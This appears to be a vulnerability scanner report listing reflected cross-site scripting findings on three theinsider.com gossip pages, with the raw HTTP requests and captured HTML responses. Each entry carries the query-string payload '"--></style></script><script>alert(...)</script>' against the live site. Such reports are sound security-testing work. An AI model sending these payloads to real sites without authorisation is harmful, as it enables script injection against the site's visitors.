- /gossip/38520_Celebrity_Couples_Status_Update/index.html

/gossip/38520_Celebrity_Couples_Status_Update/index.html

http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html?'%22--%3E%3C/style..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025E9)</script>

Request

GET /gossip/38520_Celebrity_Couples_Status_Update/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/39237_Before_They_Were_Famous/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:10 GMT
Content-Length: 19098
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Celebrity Couples Status Update - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="celebrity couple update, Celebrity Couples Status Update, gallery, gossip, status update" /> <meta name="category" content="gossip" /> <meta name="date" content="2011-09-20 11:22:00" /><meta property="og:title" content="Celebrity Couples Status Update" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" /><meta property="og:description" content="From breaking up to hooking up, here's a look at some stars in the midst of real to rumored romances (or lack thereof).First up we've got Ashlee Simpson and Vincent Piazza.Ashlee and the Boardwalk Empire actor have only been dating for a few months, but that is apparently enough time for Vincent to introducethe singer/actresstohis parents.The couple and Vincent's parents were spotteddining together Sunday night after the Emmy Awards at HBO's star-studded after party in West Hollywood, Us Weekly reports.The photo shows Ashlee and Vincent getting cozy at the HBO bash." /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-09-20 11:22:00" /><Attribute name="sdate" value="20110920" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_gallery;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_gallery;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_gallery;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: gallery.mc --><link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><link rel="stylesheet" href="/new_insider/jcapslide_css.css" type="text/css" /><script type="text/javascript">var cookie_booroo=0, random_booroo=0, enddate_booroo=0, maxchecked_booroo=0, jsonurl_booroo='http://booroo.com/app/vote.asp', customurl_booroo='';</script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><style>.img_link {height:410px; display:block;}.hide_thumb{visibility: hidden;}#left_col {width: 600px;}body{font-size:0.825em; color:#666; font-family:Arial, Helvetica, sans-serif;}.clear{clear:both;}</style><!--[if IE 7]><style type="text/css">#main {left: -50px; margin: 10px auto; position: relative; top: -20px; width: 410px;}#gallery_nav_back {display: inline; float: left; height: 404px; text-align: left; width: 168px; position: relative; left: -34px; top: 0px;}#gallery_nav_next {display: inline; float: left; height: 535px; text-align: right; width: 167px; position: relative; left: 33px; top: 0px;}.lovethis_storylist ul {margin-left: -16px;}</style><![endif]--> <!-- MAIN CONTENT --><div id="main_content"> <!-- LEFT COLUMN --> <div id="left_col"> <!-- CHANNEL TITLE --> <div id="channel_title_bar"> <a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a> </div> <!-- END CHANNEL TITLE --> <!-- GALLERY CONTAINER --> <div class="content_container"><!-- START PHOTO GALLERY --> <h2 class="featured-photo-gallery-heading" style="line-height: 100%;">Ashlee Simpson Meets New Beau's Parents</h2> <div> <div class="photo_container_left"> <div id="photo-gallery-main" onMouseOut="hidenav()" onMouseOver="shownav()"> <!-- <div id="photo-gallery-main"> --> <div id="gallery_nav"> <div id="gal_buttons" style="visibility:visible"> <div id="gallery_nav_back"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=82"><img src="/media/img/PhotoGalleryArrows_left.jpg" border="0" class="nav_button" /></a> </div> <div id="gallery_nav_next"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2"><img src="/media/img/PhotoGalleryArrows_right.jpg" border="0" class="nav_button" /></a> </div> </div> </div> <div class="featured-photo-gallery-img1"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2" class="img_link"> <!-- BEGIN SINGLE IMAGE OPTION--><img src="/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_335_pix.jpg" border="0" alt="ashlee_simpson_vincent_piazza_jkravitz_180911" /><!-- END SINGLE IMAGE OPTION--> </a> <p class="copyright_img" style="margin: 0px; font-size: 10px;">Copyright 2011 Jeff Kravitz/ Getty Images</p> <!-- END of Gallery Nav --> <div class="clearfix"></div> </div> </div> <!-- photo div --> <div class="clearfix"></div> <h3 class="image-title">Celebrity Couples Status Update</h3> <div id='article_date'>September 20, 2011</div> <div class="caption"> <p class="featured-photo-gallery-text featured_margin_fix" style="margin: 0; width: 380px;"><p>From breaking up to hooking up, here's a look at some stars in the midst of <a href="http://cm1.theinsider.com/gossip/40647_They_Dated_Surprising_Hookups/index.html?photo=10" target="_blank">real to rumored romances</a> (or lack thereof).&nbsp;First up we've got Ashlee Simpson and Vincent Piazza.</p><p>Ashlee and the <em>Boardwalk Empire</em> actor have only been dating for a few months, but that is apparently enough time for Vincent to introduce&nbsp;the singer/actress&nbsp;to&nbsp;his parents.</p><p>The couple and Vincent's parents were spotted&nbsp;dining together Sunday night after the Emmy Awards at HBO's star-studded after party in West Hollywood, <a href="http://www.usmagazine.com/celebritynews/news/ashlee-simpson-meets-beau-vincent-piazzas-parents-2011209" target="_blank">Us Weekly reports</a>.</p><p>The photo shows Ashlee and Vincent getting cozy at the HBO bash.</p></p><!-- SOCIAL SHARE BTNS --><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script><script src="http://booroo.com/app/polltheme/2/poll.js" type="text/javascript"></script><div class="clearfix"></div> <div id="social_share_buttons" style="margin: 10px 0 20px 0;"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like></div> <!-- TWEET BTN --> <div style="float: left; margin-top:10px;"> <a href='http://www.twitter.com/home?status=Celebrity+Couples+Status+Update+http://theinsider.com/p/?7rfa2k+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> </div> <!-- END SOCIAL SHARE BTNS --> </div> </div><div class="photo_container_right" > <!-- thumbs --> <div id="main" > <ul id="holder" class="hide_thumb"> <li><a href="#" class="featured-photo-gallery-thumb-link"><img class="featured-photo-gallery-selector1" height="81px" width="81px" src="/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" alt="" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2" class="featured-photo-gallery-thumb-link"><img src="/media/photo/2011/09/87106/britney_spears_jason_trawick_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=3" class="featured-photo-gallery-thumb-link"><img src="/media/photo/david_schwimmer_zoe_schwimmer_dward_101110_106693104_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=4" class="featured-photo-gallery-thumb-link"><img src="/media/photo/ryan_gosling_jkempin_190711_119389593_emendes_awalker_117159541_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=5" class="featured-photo-gallery-thumb-link"><img src="/media/photo/rachel_weisz_daniel_craig_150_104069750_103074853_REV.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><..
- /gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html

/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html

http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.ht..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025FD)</script>

Request

GET /gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/39237_Before_They_Were_Famous/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:11 GMT
Content-Length: 13212
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Kelly Osbourne's Tense Paparazzi Confrontation [video]</title><meta name="description" content="" /><meta name="keywords" content="Kelly Osbourne, news, paparazzi, the roosevelt hotel" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-12 10:08:00" /><meta property="og:title" content="Kelly Osbourne's Tense Paparazzi Confrontation [video]" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81973/vid_kelly_150_114111370.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Well she's never been known to hold back has she? Kelly Osbourne was in a less than friendly mood when paparazzi swarmed her as she left the Roosevelt Hotel in Hollywood Wednesday night, and the tense scene was caught on tape." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-12 10:08:00" /> <Attribute name="sdate" value="20110812" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81973/vid_kelly_150_114111370.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <div id='slate_player' class='show_slate' style='z-index: 2;'><object id='flashobject' type='application/x-shockwave-flash' allowScriptAccess='always' allowFullScreen='true' allowNetworking='all' height='272' width='431' data ='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'><param name='quality' value='high' /><param name='allowFullScreen' value='true' /><param name='allowScriptAccess' value='always' /><param name='allowNetworking' value='all' /><param name='movie' value='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'/><param name='flashvars' value='config=http://r.unicornmedia.com/embed/ab2b5d77-6ea3-4720-8249-dccf2b6bac03?view=fkey%26view_id=43354&programID=4dd16b9508b2e' /></object></div><div id='adCompanionBanner'></div> </div><p class='article'><h3>Kelly Osbourne vs. the Paparazzi [video]</h3><p class='publish_date'>By ANTOINETTE BUENO</p><p class='publish_date'>August 12, 2011</p><p>
Well she's never been known <a target="_blank" href="http://cs1.theinsider.com/gossip/43159_Trash_Talk_Kelly_Osbourne_Slams_Christina_Aguilera_Calls_Singer_Fat_Btch/index.html">to hold back</a> has she? Kelly Osbourne was in a less than friendly mood when paparazzi swarmed her as she left <a target="_blank" href="http://www.theinsider.com/news/40532_Paparazzi_Roundup_Will_Smith_Takes_NY_Kelly_Osbourne_in_LA_and_More/index.html">the Roosevelt Hotel</a> in Hollywood Wednesday night, and the tense scene was caught on tape.<br /></p><p>
Holding a fan over her face, the paparazzi seem to be genuinely offended when Kelly apparently called them a foul name, with one paparazzo shouting, &quot;C'mon Kelly, be nice, we're being nice to you!&quot;</p><p>
Check out the video for Kelly's amusing response.













</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class=&..
- /gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/

/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/

http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/?'%22--%3E%3C/style%3E%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025DB)</script>

Request

GET /gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:09 GMT
Content-Length: 13090
